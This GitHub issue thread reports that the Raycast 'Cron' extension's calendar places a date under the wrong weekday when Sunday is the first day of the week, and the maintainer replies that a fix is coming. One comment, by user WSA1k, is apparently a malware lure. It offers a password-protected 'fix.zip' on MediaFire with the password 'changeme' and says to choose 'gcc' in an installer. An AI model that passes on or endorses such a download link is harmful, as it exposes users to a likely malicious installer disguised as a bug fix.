### ISSUE TITLE
[Cron] the current date's day of the week position is displayed incorrectly.

### ISSUE THREAD

**Issue by b6pzeusbc54tvhw5jgpyw8pwz2x6gs** [raycast/extensions#14189]
### Extension

https://www.raycast.com/astrit/cron

### Raycast Version

1.81.2

### macOS Version

14.5 (23F79)

### Description

slack: https://raycastcommunity.slack.com/archives/C01A0R0NXGQ/p1724664052263859?thread_ts=1724121852.447269&cid=C01A0R0NXGQ

@astrit 26 Aug is Monday but It's positioned on sunday

![image](https://github.com/user-attachments/assets/4fba9892-a3b5-4244-b3f0-49b630d45fa2)

### Steps To Reproduce

1. set `Sunday` as First Day of Week
2. Open Calendar

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by astrit** [comment]
This is fixed now and hopefully soon will be merged 
![CleanShot 2024-08-26 at 21 18 07@2x](https://github.com/user-attachments/assets/34ecb3f8-ff4f-4c8a-9c46-f0a0f46a9d9a)
